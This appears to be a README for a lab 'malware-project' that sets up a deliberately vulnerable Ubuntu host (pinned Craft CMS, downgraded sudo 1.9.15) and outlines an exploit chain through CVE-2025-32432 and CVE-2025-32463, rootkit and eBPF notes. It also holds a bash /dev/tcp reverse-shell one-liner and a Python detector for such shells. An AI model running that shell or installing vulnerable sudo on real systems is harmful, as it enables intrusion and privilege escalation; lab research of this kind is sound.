UserNombre/malware-project
Installation and setup

The first step is installing Ubuntu 24.04.2, which can be downloaded from https://old-releases.ubuntu.com/releases/24.04.2/. In our case we selected the ubuntu-24.04.2-desktop-amd64.iso image.

Afterwards you need to install docker and ddev on the machine. The installation guide for ddev is at https://docs.ddev.com/en/stable/users/install/ddev-installation/. In any case, the commands we used to install ddev are the following:

```bash
# Add DDEV’s GPG key to your keyring
sudo sh -c 'echo ""'
sudo apt-get update && sudo apt-get install -y curl
sudo install -m 0755 -d /etc/apt/keyrings
curl -fsSL https://pkg.ddev.com/apt/gpg.key | gpg --dearmor | sudo tee /etc/apt/keyrings/ddev.gpg > /dev/null
sudo chmod a+r /etc/apt/keyrings/ddev.gpg

# Add DDEV releases to your package repository
sudo sh -c 'echo ""'
echo "deb [signed-by=/etc/apt/keyrings/ddev.gpg] https://pkg.ddev.com/apt/ * *" | sudo tee /etc/apt/sources.list.d/ddev.list >/dev/null

# Update package information and install DDEV
sudo sh -c 'echo ""'
sudo apt-get update && sudo apt-get install -y ddev

# One-time initialization of mkcert
mkcert -install
```

In the case of docker, the installation guide is at https://docs.docker.com/engine/install/ubuntu/. In our case we used the following commands to install docker:

```bash
# Add Docker's official GPG key:
sudo apt update
sudo apt install ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc

# Add the repository to Apt sources:
sudo tee /etc/apt/sources.list.d/docker.sources <<EOF
Types: deb
URIs: https://download.docker.com/linux/ubuntu
Suites: $(. /etc/os-release && echo "${UBUNTU_CODENAME:-$VERSION_CODENAME}")
Components: stable
Signed-By: /etc/apt/keyrings/docker.asc
EOF

sudo apt update
sudo apt install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
```

The next step is cloning the repository of the craft project at https://github.com/craftcms/starter-twig. In our case we used the version at commit 1655611c8a1907dcfcec0ee3af822d773d9e32bc. The project already has an installation guide, but in any case the commands we used to install the project are the following:

```bash
git clone https://github.com/craftcms/starter-twig.git
cd starter-twig/
git checkout 1655611c8a1907dcfcec0ee3af822d773d9e32bc
ddev start
ddev composer install
ddev craft install
```

With this you should already have craft working, with a site at https://starter-twig.ddev.site/admin. Some steps of the craft installation will ask you to create an admin user and a password. Then we have to manually install sudo 1.9.15 from https://www.sudo.ws/sudo/dist/packages/1.9.15p5/. In our case we used the following commands:

```bash
curl https://www.sudo.ws/sudo/dist/packages/1.9.15p5/sudo_1.9.15-6_ubu2204_amd64.deb --output sudo_1.9.15-6_ubu2204_amd64.deb
sudo dpkg -i sudo_1.9.15-6_ubu2204_amd64.deb
```

Now, we will make Craft accessible over the network interface, in our case using socat as a simple forwarder:

```bash
sudo apt install socat
# In our case the website is available at port 32768; it might be different in yours.
socat tcp-listen:8080,reuseaddr,fork tcp:localhost:32768
```

And with this the setup is complete.

Ubuntu machine setup

Exploit chain

RCE with CraftCMS (CVE-2025-32432)

LPE with sudo (CVE-2025-32463)

  • Write-up

  • PoC

  • Requirements

    • Vulnerable sudo (1.9.14 <= version < 1.9.17)
    • Use Ubuntu 24.04.2 (24.04.3 does not work for some reason)

Docker container escape

Malware

Rootkits

eBPF testing

  • Initial setup
    ```bash
    sudo bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h
    ```
  • Program compilation and loading
    ```bash
    clang -target bpf -O2 -g -c probe.c -o probe.o
    sudo bpftool prog loadall probe.o /sys/fs/bpf/probe autoattach
    ```
  • Program debugging output
    ```bash
    sudo bpftool prog tracelog
    ```
  • Map inspection
    ```bash
    sudo bpftool map dump name map
    ```
  • Program removal
    ```bash
    sudo rm -r /sys/fs/bpf/probe
    ```

Reverse shell

  • The bash -c wrapper is required to ensure that the /dev/tcp/ syntax is interpreted by bash
  • The exec builtin is used to reduce the number of processes created
    ```bash
    exec bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1234 0>&1'
    ```
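A defender-side check for the pattern above, added here as an example and not code from this repository: once the inner exec has run, the process cmdline is just `bash -i` and the /dev/tcp string is gone, but /proc/<pid>/fd still shows stdin, stdout and stderr all pointing at one socket. The procfs layout is real; the sample tree the block builds is constructed for the test.

```python
import os
import re
import tempfile
from pathlib import Path

# After `exec bash -i &>/dev/tcp/H/P 0>&1` the cmdline is just `bash -i`; the
# redirection string is gone. The fd table still tells: stdin, stdout and stderr
# all point at one TCP socket, which /proc/<pid>/fd shows as "socket:[inode]".
STD_FDS = ("0", "1", "2")
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")

def is_socket_bound(proc_dir):
    """True when fds 0, 1 and 2 of a /proc/<pid> directory all resolve to sockets."""
    targets = []
    for fd in STD_FDS:
        try:
            targets.append(os.readlink(Path(proc_dir) / "fd" / fd))
        except OSError:  # fd closed, process gone, or not ours to inspect
            return False
    return all(SOCKET_LINK.match(t) for t in targets)

def find_socket_bound_shells(proc_root="/proc", shells=("bash", "sh", "dash", "zsh")):
    """Scan a procfs tree; return sorted (pid, comm) of shells whose fds 0-2 are sockets."""
    hits = []
    for entry in Path(proc_root).iterdir():
        if not entry.name.isdigit():
            continue
        try:
            comm = (entry / "comm").read_text().strip()
        except OSError:
            continue
        if comm in shells and is_socket_bound(entry):
            hits.append((int(entry.name), comm))
    return sorted(hits)

def build_sample_proc():
    """Constructed procfs tree (not a real system): pid 4242 mimics the reverse shell."""
    root = Path(tempfile.mkdtemp())
    samples = (
        ("4242", "bash", ["socket:[98765]"] * 3),   # all std fds on one socket
        ("77", "bash", ["/dev/pts/0"] * 3),         # ordinary terminal shell
        ("301", "python3", ["socket:[555]"] * 3),   # socket-bound, but not a shell
    )
    for pid, comm, links in samples:
        (root / pid / "fd").mkdir(parents=True)
        (root / pid / "comm").write_text(comm + "\n")
        for fd, target in zip(STD_FDS, links):
            os.symlink(target, root / pid / "fd" / fd)
    (root / "self").mkdir()  # non-numeric entries must be skipped
    return root
```

Calling `find_socket_bound_shells()` with no arguments scans the live /proc of the machine; inetd-style services also run with socket-bound standard fds, so treat hits as leads to triage rather than verdicts.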
